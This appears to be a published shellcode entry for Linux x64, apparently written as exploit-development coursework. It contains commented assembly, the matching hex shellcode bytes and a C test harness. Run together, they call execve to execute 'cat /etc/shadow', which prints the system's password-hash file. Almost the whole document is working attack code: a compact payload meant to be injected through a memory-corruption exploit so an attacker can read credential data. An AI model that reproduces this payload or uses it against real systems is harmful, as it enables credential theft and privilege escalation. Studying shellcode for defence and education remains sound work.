# Exploit Title: Linux/x64 - execve "cat /etc/shadow" Shellcode (66 bytes) # Date: 02-08-2021 # Author: Felipe Winsnes # Tested on: Debian x64 # Shellcode Length: 66 /* global _start _start: xor rax, rax ; Zeroes out RAX. xor rbp, rbp ; Zeroes out RBP. push rax ; Pushes RAX's NULL-DWORD. mov rbp, 0x776f646168732f63 ; Moves value "wodahs/c" into RBP. push rbp ; Pushes the vaueof RBP into the Stack. mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP. push rbp ; Pushes the vaue of RBP into the Stack. mov rbp, rsp ; Copies the value of the Stack into RBP. push rax ; Pushes RAX's NULL-DWORD. mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX. push rbx ; Pushes the vaue of RBX into the Stack. mov rbx, rsp ; Copies the value of the Stack into RBX. mov rdi, rsp ; Copies the value of the Stack into RDI. push rax ; Pushes RAX's NULL-DWORD. mov rdx, rsp ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0. push rbp ; Pushes the vaue of RBP into the Stack. push rbx ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow". mov rsi, rsp ; Copies this entire string from the Stack into RSI. push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format). pop ax ; Pops this value into AX so there are no NULLs. syscall ; The syscall is executed. */ /* Usage: whitecr0wz@SLAE64:~/assembly/execve/cat$ gcc cat_shadow.c -o cat_shadow -fno-stack-protector -z execstack -w whitecr0wz@SLAE64:~/assembly/execve/cat$ ./cat_shadow */ #include unsigned char shellcode[] = \ "\x48\x31\xc0\x48\x31\xed\x50\x48\xbd\x63\x2f\x73\x68\x61\x64\x6f\x77\x55\x48\xbd\x2f\x2f\x2f\x2f\x2f\x2f\x65\x74\x55\x48\x89\xe5\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74\x53\x48\x89\xe3\x48\x89\xe7\x50\x48\x89\xe2\x55\x53\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05"; int main() { int (*ret)() = (int(*)())shellcode; ret(); }